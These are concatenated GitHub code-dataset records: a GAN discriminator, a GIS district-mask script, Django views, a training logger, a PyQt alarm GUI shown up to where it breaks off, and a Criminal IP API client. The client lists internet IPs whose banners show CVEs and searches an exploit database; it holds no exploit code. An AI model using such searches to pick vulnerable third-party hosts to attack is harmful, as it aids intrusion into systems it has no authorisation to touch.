     self.logger = logger\n        self.model = nn.Sequential(\n            nn.Linear(self.z, 100),\n            nn.LeakyReLU(),\n            nn.Linear(100, 1),\n            nn.Sigmoid(),\n        )\n        self._optim = torch.optim.Adam(self.model.parameters(), lr=lr)\n        self._criterion = torch.nn.BCELoss()\n        self.cnt = 0\n        self.to(util.device)\n        self._transform_obs_action = None\n\n    def forward(self, next_state) -> torch.Tensor:\n        return torch.clip(self.model(next_state), 0.05, 0.95)\n\n    def rollout_offline_buffer(self,\n                               batch_size: int\n                               ) -> torch.Tensor:\n        \"\"\"\n        
return: Tensor shape[batch_size, cat_vector]\n \"\"\"\n rollout_data = self.offline_buffer.sample(batch_size)\n obs = torch.Tensor(rollout_data[\"observations\"])\n act = torch.Tensor(rollout_data[\"actions\"])\n next_obs = torch.Tensor(rollout_data[\"next_observations\"])\n rew = torch.Tensor(rollout_data[\"rewards\"])\n delta_obs = next_obs - obs\n obs, act = self._transform_obs_action(obs, act)\n rollout_data = torch.cat([obs, act, delta_obs, rew], dim=1).to(util.device)\n return rollout_data\n\n def get_transform_obs_action(self, transform_obs_action):\n self._transform_obs_action = transform_obs_action\n\n def compute_loss(self,\n model_input: torch.Tensor,\n predictions: torch.Tensor,\n groundtruths: torch.Tensor\n ):\n \"\"\"\n model_input: [obs_t, act_t]\n predictions shape: [ensemble_num, batch_size, next_obs + rew]\n \"\"\"\n pre_mean, pre_var = predictions\n batch_size = model_input.shape[0]\n expert = self.rollout_offline_buffer(batch_size)\n loss_sum = torch.tensor(0.0, dtype=torch.float32).to(util.device)\n loss_gen_sum = torch.tensor(0.0, dtype=torch.float32).to(util.device)\n for i in range(pre_mean.shape[0]):\n learner = torch.cat([model_input, pre_mean[i]], dim=1).to(util.device)\n real_loss = self._criterion(self.model(expert), Variable(torch.ones(batch_size, 1).to(util.device)))\n fake_loss = self._criterion(self.model(learner.detach()), Variable(torch.zeros(batch_size, 1).to(util.device)))\n g_loss = self._criterion(self.model(learner), Variable(torch.ones(batch_size, 1).to(util.device)))\n\n # record expert and learner var\n if self.cnt % 5 == 0:\n self.logger.record(\"var/model_expert\", self.model(expert).detach().mean(), self.cnt, printed=False)\n self.logger.record(\"var/model_learner\", self.model(learner).detach().mean(), self.cnt, printed=False)\n self.cnt += 1\n\n discriminator_loss = (fake_loss.mean() + real_loss.mean()) / 2\n generate_loss = g_loss.mean()\n loss_sum += discriminator_loss\n loss_gen_sum += generate_loss\n self.logger.record(\"loss/d_loss\", loss_sum.mean(), self.cnt, printed=False)\n self.logger.record(\"loss/g_loss\", loss_gen_sum.mean(), self.cnt, printed=False)\n return loss_sum, loss_gen_sum\n\n def update(self, loss):\n self._optim.zero_grad()\n loss.backward(retain_graph=True)\n self._optim.step()\n\n @torch.no_grad()\n def compute_penalty(self,\n observations: np.ndarray,\n actions: np.ndarray,\n next_obs: np.ndarray,\n rewards: np.ndarray,\n ) -> np.ndarray:\n obs_tp1 = torch.tensor(next_obs, dtype=torch.float32).to(util.device)\n rew_tp1 = torch.tensor(np.reshape(rewards, (-1, 1)), dtype=torch.float32).to(util.device)\n rew_p = torch.cat([observations, actions, obs_tp1, rew_tp1], dim=1).to(util.device)\n d_penalty = self.forward(rew_p)\n d_penalty = 1 - d_penalty\n return d_penalty.detach().cpu().numpy()\n\n @property\n def get_interval(self):\n return self.interval\n","repo_name":"junming-yang/MOAN","sub_path":"models/discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9696699972","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 30 16:44:30 2017\n\n@author: xiaomuliu\n\"\"\"\n\nimport cPickle as pickle\nimport re\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\n#import matplotlib.pyplot as plt\nfrom SetupGrid import get_cluster_mask, flattened_to_geoIm\nimport sys\nsys.path.append('..')\nfrom Misc.ComdArgParse import ParseArg\nfrom 
FeatureExtraction.SpatialRelation import pt_poly_membership, pt_to_nearest_geoObj\n\nargs = ParseArg()\ninfiles = args['input']\noutpath = args['output']\nparams = args['param']\n\ninfile_match = re.match('([\\w\\./]+) ([\\w\\./]+)',infiles) \nif infile_match.group(0) is not None:\n    grid_pkl, district_shp = infile_match.group(1), infile_match.group(2)\nelse: \n    grid_pkl = '../SharedData/SpatialData/grid.pkl'\n    district_shp = '../SharedData/GISData/cpd_districts/cpd_districts.shp'\n\nfilePath_save = outpath if outpath is not None else '../SharedData/SpatialData/'\n\ncell_match = re.match('(\\d+) (\\d+)',params)\ncellsize = (int(cell_match.group(1)), int(cell_match.group(2)))\n \n# load grid info \nwith open(grid_pkl,'rb') as grid_file:\n    grd_vec, grd_x, grd_y, grd_vec_inCity, mask_grdInCity, maskIm_grdInCity = pickle.load(grid_file) \n    \n    \n#district_shp ='../SharedData/GISData/cpd_districts/cpd_districts.shp' # leftover hard-coded override of the path parsed above\n\nproj_str = \"+proj=tmerc +lat_0=36.66666666666666 +lon_0=-88.33333333333333 +k=0.9999749999999999 \" + \\\n    \"+x_0=300000 +y_0=0 +datum=NAD83 +units=us-ft +no_defs +ellps=GRS80 +towgs84=0,0,0\" \n    \nshpfile = gpd.read_file(district_shp)\nshpfile.plot()\n\ndistrict_nums = np.unique(shpfile['DISTRICT'].values)\ndistrict_nums = district_nums[district_nums!='031'] #remove district 031\n\ndistrict_label = np.zeros(len(grd_vec_inCity)).astype('str')\n#district_mask = {}\nfor dist_num in district_nums:\n    isIndistrict = pt_poly_membership(grd_vec_inCity,shpfile.ix[shpfile['DISTRICT']==dist_num],proj=proj_str)['indicator']\n    isIndistrict = isIndistrict.flatten()\n#    district_mask[dist_num] = get_cluster_mask(mask_grdInCity,isIndistrict,True)\n\n#    #visualize \n#    m = flattened_to_geoIm(isIndistrict,len(grd_x),len(grd_y),mask=mask_grdInCity)\n#    fig = plt.figure()\n#    plt.imshow(m) \n    \n    district_label[isIndistrict] = dist_num\n\n# assign grid cells that do not fall in any districts to their nearest districts\nout_cells = grd_vec_inCity[district_label=='0.0']\nnearest_district_idx = pt_to_nearest_geoObj(out_cells,shpfile.ix[shpfile['DISTRICT']!='031',:])\nnearest_district = shpfile.ix[nearest_district_idx,'DISTRICT'].values\ndistrict_label[district_label=='0.0'] = nearest_district\n\ndistrict_mask = {}\nfor dist_num in district_nums: \n    district_mask[dist_num] = get_cluster_mask(mask_grdInCity,district_label==dist_num,True)\n\n    \nsavefile = filePath_save+'masks_district.pkl' \nwith open(savefile,'wb') as outputfile:\n    pickle.dump(district_mask, outputfile, pickle.HIGHEST_PROTOCOL) \nsavefile = filePath_save+'label_district.pkl' \nwith open(savefile,'wb') as outputfile:\n    pickle.dump(district_label, outputfile, pickle.HIGHEST_PROTOCOL) \n    \ndistrict_label_df = pd.DataFrame(district_label) \ndistrict_label_df.to_csv(filePath_save+'label_district.csv',header=False,index=False) ","repo_name":"xiaomuliu/SpatioTemporalPredictiveModeling","sub_path":"Grid/DistrictMask.py","file_name":"DistrictMask.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"1147121301","text":"\ndef solution(numbers):\n    num_to_str = list(map(str,numbers))\n    # larger first digit first -> then longer strings first\n    result = sorted(num_to_str,key=lambda x: x*3,reverse=True)\n    # for i in num_to_str:\n    #     print(i*3)\n    # compared as strings, 333 > 303030 (333 is larger)\n    answer = ''.join(result)\n    return answer\nprint(solution([3, 30, 34, 5, 9]))\n\n# arr = [333, 332030, 34, 5, 9]\n# arr = list(map(str,arr))\n# arr = sorted(arr,reverse=True)\n# 
print(arr)\n","repo_name":"julia0926/TIL_Algo","sub_path":"Study/Backjoon/programmers/42746.py","file_name":"42746.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30410345398","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView, View\nfrom .models import *\nfrom django.core.mail import send_mail\n\n\n\n# Create your views here.\n\nclass HomeView(ListView):\n    model = Product\n    template_name = 'index.html'\n    \n\ndef about(request):\n    context = {}\n    return render(request, 'about.html', context)\n\ndef service(request):\n    context = {}\n    return render(request, 'service.html', context)\n\n\nclass ProductsView(ListView):\n    model = Product\n    template_name = 'shop.html'\n\n\nclass ProductDetailView(DetailView):\n    model = Product\n    template_name = 'product-detail.html'\n\n\ndef contact(request):\n    if request.method == 'POST':\n        name = request.POST['name']\n        email = request.POST['email']\n        phone = request.POST['phone']\n        message = request.POST['message']\n        message_body = f'''Hey, I am {name}. My phone number is {phone}.\n\n    {message}\n    '''\n        # send an email \n        send_mail(\n            f'Message from {name} ',\n            message_body,\n            email,\n            ['testerwebsite007@gmail.com'],\n            fail_silently=False,\n        )\n        context = {'name':name}\n    else:\n        context = {}\n    return render(request, 'contact.html', context)\n","repo_name":"sunanda-bag/creative-chair-website-django","sub_path":"my_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10404376934","text":"import os\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport torch\r\n\r\n\r\n\r\ndef Recode(epoch, model, dir_name, CFG, train_loss, val_loss, train_acc, val_acc, best_loss, best_acc, model_save=False):\r\n    # resume the existing log if present, otherwise start a fresh one\r\n    if os.path.isfile(f\"./result/{dir_name}/recode.csv\"):\r\n        recode_df = pd.read_csv(f\"./result/{dir_name}/recode.csv\")\r\n    else:\r\n        recode_df = pd.DataFrame(columns=['epoch', 'train_loss', 'val_loss',\r\n                                      'train_acc', 'val_acc', 'best_loss',\r\n                                      'best_acc'])\r\n    \r\n    fig, axes = plt.subplots(1, 2)\r\n    plt.close(fig)\r\n\r\n    # Data Write\r\n    os.makedirs(f\"./result/{dir_name}\", exist_ok=True)\r\n    new_data = {\r\n        \"epoch\": epoch,\r\n        \"train_loss\": train_loss,\r\n        \"val_loss\": val_loss,\r\n        \"train_acc\": train_acc,\r\n        \"val_acc\": val_acc,\r\n        \"best_loss\": best_loss,\r\n        \"best_acc\": best_acc\r\n    }\r\n\r\n    recode_df = recode_df.append(new_data, ignore_index=True)\r\n    recode_df.to_csv(f'./result/{dir_name}/recode.csv', index=False)\r\n\r\n    # Data Visualization\r\n    os.makedirs(f\"./result/{dir_name}/plot\", exist_ok=True)\r\n    fig, axes = plt.subplots(1, 2)\r\n    fig = plt.figure(figsize=(20, 7))\r\n\r\n    ax1 = fig.add_subplot(1, 2, 1)\r\n    ax1.plot(recode_df['train_loss'].to_list(), label=\"train loss\")\r\n    ax1.plot(recode_df['val_loss'].to_list(), label=\"val loss\")\r\n    ax1.legend()\r\n\r\n    ax2 = fig.add_subplot(1, 2, 2)\r\n    ax2.plot(recode_df['train_acc'], label=\"train Accuracy\")\r\n    ax2.plot(recode_df['val_acc'], label=\"val Accuracy\")\r\n    ax2.legend()\r\n\r\n    if os.path.isfile(f\"./result/{dir_name}/plot/loss_and_acc.png\"):\r\n        os.remove(f\"./result/{dir_name}/plot/loss_and_acc.png\")\r\n    plt.savefig(f\"./result/{dir_name}/plot/loss_and_acc.png\")\r\n\r\n    # Write Hyperparameter\r\n    if epoch == 1:\r\n        with open(f\"./result/{dir_name}/train.txt\", 'w', 
encoding='UTF-8') as f:\r\n            f.write(f\"{CFG}\" + \"\\n\")\r\n\r\n    if model_save:\r\n        torch.save(model, f\"./result/{dir_name}/model.pt\")\r\n\r\n","repo_name":"co1dtype/Dacon_Text_Recognition","sub_path":"modules/recoder.py","file_name":"recoder.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34830887137","text":"import argparse\nimport json\nimport os\nimport random\nimport requests\nimport time\nfrom pprint import pprint\nfrom config import user_agents\nfrom example_queries import queries\n\n\nHEADERS = {\n    \"x-api-key\": \"\",\n    \"User-Agent\": random.choice(user_agents.agents),\n}\n\n\ndef menu():\n    print(\"\"\"\n1. Get API plan info\n2. Get IPs from asset banner search\n3. Get IPs with CVE from search query\n4. Check whether IP(s) have CVE\n5. Get whois info\n6. Get domain info\n7. Find exploits\n8. Example queries\n9. Change API Key\n10. Exit\n    \"\"\")\n\n\ndef get_user_api_info(x_api_key):\n    url = 'https://api.criminalip.io/v1/user/me'\n    data = {\n        'x-api-key': x_api_key \n    }\n    \n    res = requests.post(url=url, headers=HEADERS)\n    res = res.json()\n\n    if res['status'] == 401:\n        print(\"Please check your api key from .api_key file\")\n\n    if res['status'] == 200:\n        data = res['data']\n        print(\"--------------------------------------------------\")\n        print(\"account_type : {}\".format(data['account_type']))\n        print(\"api_key : {}\".format(x_api_key))\n        print(\"company_name : {}\".format(data['company_name']))\n        print(\"email : {}\".format(data['email']))\n        print(\"last_access_date : {}\".format(data['last_access_date']))\n        print(\"max_search : {}\".format(data['max_search']))\n        print(\"membership_date: {}\".format(data['membership_date']))\n        print(\"name : {}\".format(data['name']))\n        print(\"plan_date: {}\".format(data['plan_date']))\n        print(\"--------------------------------------------------\")\n\n\ndef get_ips(search_type=None, keyword=None, port=None, product=None, version=None, service=None, tag=None, tech_stack=None, offset=None):\n    url = 'https://api.criminalip.io/v1/banner/search'\n    params = {\n        \"query\": '',\n        \"offset\": 0,\n    }\n\n    if offset:\n        params['offset'] = offset\n\n    search_query = ''\n    if search_type == 'by_port':\n        params['query'] = '{} port: {}'.format(keyword, port)\n\n        options = {'keyword': keyword, 'port': port}\n        for k, v in options.items():\n            if v:\n                if k == 'keyword':\n                    search_query += '{} '.format(v)\n                else:\n                    search_query += '{}:{} '.format(k, v)\n\n    elif search_type == 'by_software':\n        params['query'] = '{} product: {} product_version: {}'.format(keyword, product, version)\n        search_query = params['query']\n    \n    elif search_type == 'by_service':\n        params['query'] = '{} service: {}'.format(keyword, service)\n        search_query = params['query']\n\n    elif search_type == 'by_tag':\n        params['query'] = '{} tag: {}'.format(keyword, tag)\n        search_query = params['query']\n\n    elif search_type == 'by_tech_stack':\n        params['query'] = '{} tech_stack: {}'.format(keyword, tech_stack)\n        search_query = params['query']\n\n    ip_list = []\n    res = requests.get(url=url, params=params, headers=HEADERS)\n    res = res.json()\n\n    if res['status'] == 200:\n        for r in res['data']['result']:\n            ip_list.append(r['ip_address'])\n            print(r['ip_address'])\n\n    print('Criminal_IP Search Query ===> {}'.format(search_query))\n\n    option = input(\"Do you want to get result count? 
Y/N : \")\n    if option == 'Y' or option == 'y':\n        stats_url = 'https://api.criminalip.io/v1/banner/stats'\n        res = requests.get(url=stats_url, params=params, headers=HEADERS)\n        res = res.json()\n\n        if res['status'] == 200:\n            print(\"Result count : {}\".format(res['data']['count']))\n\n\ndef get_cve_ips(query, offset=None):\n    url = 'https://api.criminalip.io/v1/banner/search'\n    params = {\n        \"query\": query,\n        \"offset\": 0,\n    }\n\n    if offset:\n        params['offset'] = offset\n\n    ip_list = []\n    res = requests.get(url=url, params=params, headers=HEADERS)\n    res = res.json()\n\n    if res['status'] == 200:\n        for r in res['data']['result']:\n            if r['has_cve']:\n                ip_list.append(r['ip_address'])\n                print(':'.join([r['ip_address'], str(r['open_port_no'])]))\n\n    if len(ip_list) == 0:\n        print(\"No IPs with CVE found\")\n\n\ndef get_whois_data(ip):\n    url = 'https://api.criminalip.io/v1/ip/data'\n    params = {\n        'ip': ip\n    }\n\n    res = requests.get(url=url, params=params, headers=HEADERS)\n    res = res.json()\n    \n    if res['status'] == 200:\n        data = res['whois']['data'][0]\n        print(\"--------------------------------------------------\")\n        print('as name: {}'.format(data['as_name']))\n        print('as number: {}'.format(data['as_no']))\n        print('city: {}'.format(data['city']))\n        print('confirmed time: {}'.format(data['confirmed_time']))\n        print('latitude: {}'.format(data['latitude']))\n        print('longitude: {}'.format(data['longitude']))\n        print('org country code: {}'.format(data['org_country_code'].upper()))\n        print('org name: {}'.format(data['org_name']))\n        print('postal code: {}'.format(data['postal_code']))\n        print(\"--------------------------------------------------\")\n\n\ndef get_domain_data(domain):\n    url = 'https://api.criminalip.io/v1/domain/scan'\n    data = {\n        'query': domain\n    }\n\n    res = requests.post(url=url, data=data, headers=HEADERS)\n    res = res.json()\n    \n    scan_id = ''\n    if res['status'] == 200:\n        scan_id = res['data']['scan_id']\n\n    print(\"Please wait for a moment... 
(30-40 seconds)\")\n    while True:\n        domain_scan_result_url = 'https://api.criminalip.io/v1/domain/report/{}'.format(scan_id)\n        domain_scan_res = requests.get(url=domain_scan_result_url, headers=HEADERS)\n        domain_scan_res = domain_scan_res.json()\n\n        time.sleep(3)\n        if domain_scan_res['status'] == 200:\n            dns_record = domain_scan_res['data']['dns_record']\n\n            print(\"--------------------------------------------------\")\n            ipv4 = [ipv4['ip'] for ipv4 in dns_record['dns_record_type_a']['ipv4']]\n            ipv6 = [ipv6['ip'] for ipv6 in dns_record['dns_record_type_a']['ipv6']]\n            print('dns_record_type_a - ipv4 : {}'.format(', '.join(ipv4)))\n            print('dns_record_type_a - ipv6 : {}'.format(', '.join(ipv6)))\n\n            if dns_record['dns_record_type_cname']:\n                print('dns_record_type_cname : {}'.format(', '.join(map(str, dns_record['dns_record_type_cname']))))\n            if dns_record['dns_record_type_mx']:\n                print('dns_record_type_mx : {}'.format(', '.join(map(str, dns_record['dns_record_type_mx']))))\n            if dns_record['dns_record_type_ns']:\n                print('dns_record_type_ns: {}'.format(', '.join(dns_record['dns_record_type_ns'])))\n            if dns_record['dns_record_type_ptr']:\n                print('dns_record_type_ptr : {}'.format(', '.join(dns_record['dns_record_type_ptr'])))\n            if dns_record['dns_record_type_soa']:\n                print('dns_record_type_soa : {}'.format(', '.join(dns_record['dns_record_type_soa'])))\n            print(\"--------------------------------------------------\")\n\n            break\n\n\ndef find_exploits(search_type=None, cve_id=None, author=None, edb_id=None, platform=None, exploit_type=None, keyword=None, offset=None):\n    url = 'https://api.criminalip.io/v1/exploit/search'\n    params = {\n        'query': '',\n        'offset': 0\n    }\n\n    if offset:\n        params['offset'] = offset\n\n    if search_type == 'by_cve_id':\n        params['query'] = 'cve_id: {}'.format(cve_id)\n    elif search_type == 'by_author':\n        params['query'] = 'author: {}'.format(author)\n    elif search_type == 'by_edb_id':\n        params['query'] = 'edb_id: {}'.format(edb_id)\n    elif search_type == 'by_platform':\n        params['query'] = 'platform: {}'.format(platform)\n    elif search_type == 'by_exploit_type':\n        params['query'] = 'type: {}'.format(exploit_type)\n    elif search_type == 'by_keyword':\n        params['query'] = '{}'.format(keyword)\n\n    res = requests.get(url=url, params=params, headers=HEADERS)\n    res = res.json()\n\n    if res['status'] == 200:\n        for i, r in enumerate(res['data']['result']):\n            print(\"--------------------------------------------------\")\n            print(\"{} / {}\".format(i+1, len(res['data']['result'])))\n            print(\"author : {}\".format(r['author']))\n            print(\"edb id : {}\".format(r['edb_id']))\n            print(\"edb registration date : {}\".format(r['edb_reg_date']))\n            print(\"platform : {}\".format(r['platform']))\n            print(\"title : {}\".format(r['title']))\n            print(\"type : {}\".format(r['type']))\n\n    option = input(\"Do you want to get result count? 
Y/N : \")\n if option == 'Y' or option == 'y':\n stats_url = 'https://api.criminalip.io/v1/exploit/search'\n res = requests.get(url=stats_url, params=params, headers=HEADERS)\n res = res.json()\n\n if res['status'] == 200:\n print(\"Result count : {}\".format(res['data']['count']))\n\n\ndef change_api_key(api_key):\n with open('.api_key', 'w') as file:\n file.write(api_key)\n file.close()\n\n print(\"Successfully updated your criminal_ip api key\")\n\n\ndef main():\n if os.path.exists('.api_key'):\n with open('.api_key', 'r') as file:\n api_key = file.readline().strip()\n else:\n api_key = input(\"Enter Criminal_IP API KEY : \")\n with open('.api_key', 'w') as file:\n file.write(api_key)\n file.close()\n\n global HEADERS\n HEADERS['x-api-key'] = api_key\n \n while True:\n menu()\n\n selected_num = int(input(\"Enter Selection: \"))\n\n if selected_num == 1:\n get_user_api_info(HEADERS['x-api-key'])\n\n elif selected_num == 2:\n while True:\n print(\"\"\"\n1. Get IPs by port\n2. Get IPs by software product/version\n3. Get IPs by service\n4. Get IPs by tag\n5. Get IPs by tech_stack\n6. Return to main menu\n\"\"\")\n\n option = int(input(\"Enter Selection: \"))\n if option == 1:\n keyword = input(\"Enter keyword(optional): \")\n port = input(\"Enter port: \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n get_ips(search_type=\"by_port\", keyword=keyword, port=port, offset=offset)\n\n elif option == 2:\n keyword = input(\"Enter keyword(optional): \")\n product = input(\"Enter product name: \")\n version = input(\"Enter product version(optional): \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n get_ips(search_type=\"by_software\", keyword=keyword, product=product, version=version, offset=offset)\n\n elif option == 3:\n keyword = input(\"Enter keyword(optional): \")\n service = input(\"Enter service name: \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n get_ips(search_type=\"by_service\", keyword=keyword, service=service, offset=offset)\n\n elif option == 4:\n keyword = input(\"Enter keyword(optional): \")\n tag = input(\"Enter tag (ex: https): \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n get_ips(search_type=\"by_tag\", keyword=keyword, tag=tag, offset=offset)\n\n elif option == 5:\n keyword = input(\"Enter keyword(optional): \")\n tech_stack = input(\"Enter tech stack (ex: jQuery): \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n get_ips(search_type=\"by_tech_stack\", keyword=keyword, tech_stack=tech_stack, offset=offset)\n\n elif option == 6:\n break\n\n elif selected_num == 3:\n query = input(\"Enter search query: \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n if not query:\n print(\"Search query is necessary\")\n break\n\n get_cve_ips(query=query, offset=offset)\n\n elif selected_num == 4:\n ip = input(\"Enter IP or IP/CIDR: \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n if not ip:\n print(\"IP is necessary\")\n break\n\n query = 'ip: {}'.format(ip)\n get_cve_ips(query=query, offset=offset)\n\n elif selected_num == 5:\n ip = input(\"Enter IP : \")\n\n get_whois_data(ip=ip)\n \n elif selected_num == 6:\n domain = input(\"Enter domain: \")\n\n get_domain_data(domain=domain)\n\n elif selected_num == 7:\n while True:\n print(\"\"\"\n1. Get exploits by cve_id \n2. Get exploits by author \n3. Get exploits by edb_id\n4. Get exploits by platform \n5. Get exploits by type \n6. Get exploits by keyword\n7. 
Return to main menu\n\"\"\")\n\n option = int(input(\"Enter Selection: \"))\n if option == 1:\n cve_id = input(\"Enter CVE_ID : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_cve_id\", cve_id=cve_id, offset=offset)\n\n elif option == 2:\n author = input(\"Enter author : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_author\", author=author, offset=offset)\n\n elif option == 3:\n edb_id = input(\"Enter edb id : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_edb_id\", edb_id=edb_id, offset=offset)\n\n elif option == 4:\n platform = input(\"Enter platform : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_platform\", platform=platform, offset=offset)\n\n elif option == 5:\n exploit_type = input(\"Enter exploit type : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_exploit_type\", exploit_type=exploit_type, offset=offset)\n\n elif option == 6:\n keyword = input(\"Enter keyword : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_keyword\", keyword=keyword, offset=offset)\n\n elif option == 7:\n break\n\n elif selected_num == 8:\n print(\"Example queries are below :\")\n\n i = 0\n for k, v in queries.items():\n i += 1\n print('{} : {}'.format(i, v))\n \n elif selected_num == 9:\n api_key = input(\"Enter Criminal_IP API KEY : \")\n change_api_key(api_key)\n\n elif selected_num == 10:\n exit(\"Exit\")\n\n else:\n print(\"Selected invalid number, please select again\")\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Jaxon1111/aegis_with_jarvis","sub_path":"aegis_with_jarvis.py","file_name":"aegis_with_jarvis.py","file_ext":"py","file_size_in_byte":15336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8088658320","text":"try:\n import PyQt5.QtWidgets as QtGui\n import PyQt5.QtGui as QtGui2\n from PyQt5 import QtCore\nexcept:\n from PyQt4 import QtCore, QtGui\nimport os, platform\nfrom datetime import datetime\nfrom functools import partial\nfrom time import sleep\nimport sys\nclass Dialog(QtGui.QDialog):\n def __init__(self, inp, ctrl_library):\n QtGui.QDialog.__init__(self)\n self.ctrl_library = ctrl_library\n self.setWindowTitle(\"DynaGUI Alarms\")\n if inp == 0:\n loadflag = 0\n else:\n try:\n self.loadfile(inp,1)\n self.Nrows\n loadflag = 1\n except:\n loadflag = 0\n if loadflag == 0:\n # List of devices' server domains.\n self.devdoms = ['r3-319l/dia/tco-01/temperature',\n 'r3-319l/dia/tco-02/temperature',\n 'r3-319l/dia/tco-03/temperature',\n 'r1-101/dia/bpm-01/xmeanpossa']\n\n self.devdesc = ['R3 319 TCO 01 temperature',\n 'R3 319 TCO 02 temperature',\n 'R3 319 TCO 03 temperature',\n 'R1 101 BPM 01 x-pos']\n\n self.devlims = [36,\n 38,\n 40,\n 100]\n\n self.Nrows = 20\n self.reloadflag = 0\n self.maxsize = 0\n self.timerinterval = 30 # seconds\n\n # Construct the toplayout and make it stretchable\n self.toplayout = QtGui.QVBoxLayout(self)\n self.toplayout.addStretch()\n\n # Construct a horizontal layout box for the edit and get all attribute buttons (must be a sublayer of the toplayout)\n self.editgetallwdg = QtGui.QWidget(self)\n self.toplayout.addWidget(self.editgetallwdg)\n self.horizlayout0 = QtGui.QHBoxLayout(self.editgetallwdg)\n\n # Construct the button for setting up a 
dynamic list of attributes\n        self.listbtn = QtGui.QPushButton(\"Edit DynaGUI\")\n        self.listbtn.clicked.connect(self.listbtnclicked)\n        self.listbtn.setEnabled(True)\n        self.horizlayout0.addWidget(self.listbtn)\n        try:\n            self.doublevalidator = QtGui2.QDoubleValidator(-float('inf'),float('inf'),5)\n        except:\n            self.doublevalidator = QtGui.QDoubleValidator(-float('inf'),float('inf'),5)\n\n        # Now we construct the sublayout which will consist of the dynamically constructed buttons of the lists defined above (in example; list1 or list2)\n        self.sublayout = QtGui.QGridLayout()\n        self.toplayout.addLayout(self.sublayout)\n\n        # Now we construct a groupbox for all the dynamically constructed buttons. Edit its text to whatever is appropriate. Then it's added to the sublayout.\n        self.groupBox = QtGui.QGroupBox()\n        self.sublayout.addWidget(self.groupBox)\n        self.sublayout = QtGui.QGridLayout(self.groupBox)\n\n        # Construct a simple label widget which in this example has the purpose of displaying various messages to the user (status messages)\n        self.bottomlabel = QtGui.QLabel(\"\")\n        self.toplayout.addWidget(self.bottomlabel)\n\n        # Construct a horizontal layout box for the load and save buttons (must be a sublayer of the toplayout)\n        self.loadsavewdg = QtGui.QWidget(self)\n        self.toplayout.addWidget(self.loadsavewdg)\n        self.horizlayout1 = QtGui.QHBoxLayout(self.loadsavewdg)\n\n        # Construct a horizontal layout box for the Plot and Update buttons (must be a sublayer of the toplayout)\n        self.plotupdwdg = QtGui.QWidget(self)\n        self.toplayout.addWidget(self.plotupdwdg)\n        self.horizlayout2 = QtGui.QHBoxLayout(self.plotupdwdg)\n\n        # Construct the load and save buttons, connect them to their functions and add them to their horizontal container\n        self.loadbtn = QtGui.QPushButton(\"Load\")\n        self.savebtn = QtGui.QPushButton(\"Save\")\n        self.selectallbtn = QtGui.QPushButton(\"Select All\")\n        self.unselectallbtn = QtGui.QPushButton(\"Unselect All\")\n        self.loadbtn.clicked.connect(self.loadbtnclicked)\n        self.loadbtn.setShortcut(\"Ctrl+o\")\n        self.loadbtn.setToolTip(\"Load a configuration (ctrl+o).\")\n        self.savebtn.clicked.connect(self.savebtnclicked)\n        self.savebtn.setShortcut(\"Ctrl+s\")\n        self.savebtn.setToolTip(\"Save a configuration (ctrl+s).\")\n        self.selectallbtn.clicked.connect(self.selectallbtnclicked)\n        self.unselectallbtn.clicked.connect(self.unselectallbtnclicked)\n        self.horizlayout1.addWidget(self.loadbtn)\n        self.horizlayout1.addWidget(self.savebtn)\n        self.horizlayout1.addWidget(self.selectallbtn)\n        self.horizlayout1.addWidget(self.unselectallbtn)\n\n        self.startstopbtn = QtGui.QPushButton(\"Not running. 
Press to activate.\")\n self.startstopbtn.clicked.connect(self.startstopclicked)\n self.startstopbtn.setStyleSheet('QPushButton {background-color: maroon; color: white}')\n self.toplayout.addWidget(self.startstopbtn)\n # Run the script for generating the dynamical buttons\n self.getallDevs()\n\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.statuscheck)\n\n def selectallbtnclicked(self):\n for item in self.groupBox.findChildren(QtGui.QCheckBox):\n item.setChecked(True)\n\n def unselectallbtnclicked(self):\n for item in self.groupBox.findChildren(QtGui.QCheckBox):\n item.setChecked(False)\n\n def savebtnclicked(self):\n nameoffile = QtGui.QFileDialog.getSaveFileName(self, 'Save to File')\n if not nameoffile:\n self.bottomlabel.setText(\"Cancelled save configuration.\")\n else:\n file = open(nameoffile, 'w')\n self.toSave = str('IamaDynaGUIalarmFile' + '\\n' + \"##IamYourSeparator##\\n\" + '\\n'.join(self.devdoms) + '\\n' + \"##IamYourSeparator##\\n\" + '\\n'.join(self.devdesc) + '\\n' + \"##IamYourSeparator##\\n\" + '\\n'.join(map(str, self.devlims)) + '\\n' + \"##IamYourSeparator##\\n\" + 